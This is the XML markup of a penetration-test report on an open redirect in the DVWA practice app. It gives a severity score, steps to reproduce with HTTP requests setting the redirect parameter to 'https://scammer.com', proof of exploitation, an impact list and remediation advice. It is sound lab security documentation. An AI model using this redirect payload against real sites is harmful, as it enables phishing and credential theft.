              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="0A353F66">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="29A704D6" w:rsidP="485EA61B" w:rsidRDefault="29A704D6" w14:paraId="3052AB93" w14:textId="39293831">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No direct impact on application availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="64D6E635" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="216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485EA61B" w:rsidRDefault="485EA61B" w14:paraId="29DFE5BA" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Overall Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="252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2A0A4DCF" w:rsidP="485EA61B" w:rsidRDefault="2A0A4DCF" w14:paraId="576AE151" w14:textId="5399076A">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="4E015E8B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(Medium</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0CEBE55D" w:rsidRDefault="0CEBE55D" w14:paraId="629BE84C" w14:textId="6EA387F4">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Moderate risk with phishing and trust abuse potential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="5560E181" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="62D75FDB" w14:paraId="3C62460C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D60C8DA" w14:paraId="62BEF881" w14:textId="0CF6C42F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the vulnerable module: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D60C8DA" w14:paraId="1DC71A66" w14:textId="50C3214C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>http://localhost:4280/vulnerabilities/open_redirect/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D60C8DA" w14:paraId="51D297E5" w14:textId="69BED2FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Intercept the redirect request using Burp Suite. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D60C8DA" w14:paraId="1BB16CC8" w14:textId="35D5AE88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify the redirect destination parameter in the request. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D60C8DA" w14:paraId="7FB5BA33" w14:textId="720B1305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Example vulnerable request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D60C8DA" w14:paraId="0DEE738D" w14:textId="09C9A24D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="58AEBBC2">
        <w:t xml:space="preserve">/vulnerabilities/open_redirect/source/info.php?id=1 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidR="00191B85">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Host: localhost:4280</w:t>
      </w:r>
      <w:r w:rsidR="00191B85">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Cookie: PHPSESSID=&lt;session_id&gt;; security=low</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D60C8DA" w14:paraId="42497BCD" w14:textId="6280EA31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Replace the redirect target with an external attacker-controlled domain: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D60C8DA" w14:paraId="7016C4F0" w14:textId="745C3FCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>https://</w:t>
      </w:r>
      <w:r w:rsidR="52E4E7BE">
        <w:t>scammer</w:t>
      </w:r>
      <w:r>
        <w:t>.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D60C8DA" w14:paraId="0D168F77" w14:textId="236709FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Modified request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D60C8DA" w14:paraId="6A3A1170" w14:textId="332126BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>GET /vulnerabilities/open_redirect/source/low.php?redirect=https://</w:t>
      </w:r>
      <w:r w:rsidR="064E90B3">
        <w:t>scammer</w:t>
      </w:r>
      <w:r>
        <w:t>.com HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidR="00191B85">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Host: localhost:4280</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D60C8DA" w14:paraId="0E211E62" w14:textId="0189F2E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Send the request. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D60C8DA" w14:paraId="06AEA98A" w14:textId="71A0676F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Observe browser redirection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="4E064DD8" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="2DC19795" w14:textId="46B381DE">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="720C96E4" w14:textId="7DEE2D77">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="2F2975ED" w14:textId="385F4A25">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="59F8B236" w14:textId="448C1BB5">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="697D1A77" w14:textId="2560D67B">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="0855AC50" w14:textId="7E32AFEE">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="61C90434" w:rsidRDefault="00966105" w14:paraId="0201BB26" w14:textId="5A6280EA">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="61C90434" w:rsidP="61C90434" w:rsidRDefault="61C90434" w14:paraId="0485EFD0" w14:textId="062AA5F4">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="48A9673A" w14:textId="7F013F02">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="148C3C41" w14:textId="5AACDA76">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="62D75FDB" w14:paraId="47459E36" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="2312C206" w14:paraId="200E80C9" w14:textId="4C9AF4A4">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CA553A1" wp14:editId="1E046212">
            <wp:extent cx="6400800" cy="3990975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="139271184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2711847" name="Picture 1392711847"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="3990975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="044086C7" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="62D75FDB" w14:paraId="6514DA6D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Proof of Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="445843C8" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="2972F3F1" w14:paraId="24286889" w14:textId="5AE6B534">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t>If successful:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="2972F3F1" w14:paraId="627561AE" w14:textId="71D73B88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">browser redirects away from DVWA </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="2972F3F1" w14:paraId="6775B5D9" w14:textId="3CB89B34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">HTTP response contains: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="2972F3F1" w14:paraId="4B6C0B0B" w14:textId="7812BAE5">
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">Location: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidRPr="485EA61B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          </w:rPr>
          <w:t>https://google.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="7D9B1350" w14:textId="384FEF00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="2972F3F1" w14:paraId="64AE87DA" w14:textId="378E2F4A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06FCFF0F" wp14:editId="57FF656E">
            <wp:extent cx="6400800" cy="2066925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="174159135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91357" name="Picture 1741591357"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="2066925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="66CC24FB" w14:textId="18608D1A">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="62D75FDB" w14:paraId="7FEC8273" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="48B5E6A6" w14:paraId="16616D72" w14:textId="53E1C4CA">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t>This vulnerability allows attackers to abuse the trust users place in legitimate application URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="48B5E6A6" w14:paraId="0A65D902" w14:textId="3517AB0F">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t>Potential impacts include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="48B5E6A6" w14:paraId="78104F02" w14:textId="022FF8AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Phishing attacks </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="48B5E6A6" w14:paraId="6E77B312" w14:textId="0D277947">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Credential theft </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="48B5E6A6" w14:paraId="593910B2" w14:textId="5AB1BBD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Malware delivery </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="48B5E6A6" w14:paraId="69EAF360" w14:textId="070BC98C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Social engineering attacks </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="48B5E6A6" w14:paraId="2238D9C1" w14:textId="2C081FBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">User trust abuse </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="48B5E6A6" w14:paraId="482ECD40" w14:textId="50A972C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Brand reputation damage </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="48B5E6A6" w14:paraId="3FA6FA11" w14:textId="3B8B9A1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Redirect chaining with other attacks </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="48B5E6A6" w14:paraId="2DFD352F" w14:textId="15689764">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Session theft in advanced exploitation scenarios </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="48B5E6A6" w14:paraId="7DC2FD2B" w14:textId="2DE8B10D">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Although the application itself is not directly compromised, the trust relationship with users can be exploited for </w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B" w:rsidR="7A21E480">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B">
        <w:t>significant business impact.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="2615C088" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="62D75FDB" w14:paraId="5B15BE24" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Recommended Fix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="35352C1E" w14:paraId="2ACCE17D" w14:textId="6469820C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Avoid accepting arbitrary user-controlled redirect URLs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="35352C1E" w14:paraId="7606EFC7" w14:textId="580B5A14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Implement strict allowlisting of approved redirect destinations </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="35352C1E" w14:paraId="7808D092" w14:textId="77A6BCFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Use relative internal paths instead of full external URLs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="35352C1E" w14:paraId="57A46CC4" w14:textId="0D8B1E71">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:t xml:space="preserve">Validate redirect parameters server-side </w:t>
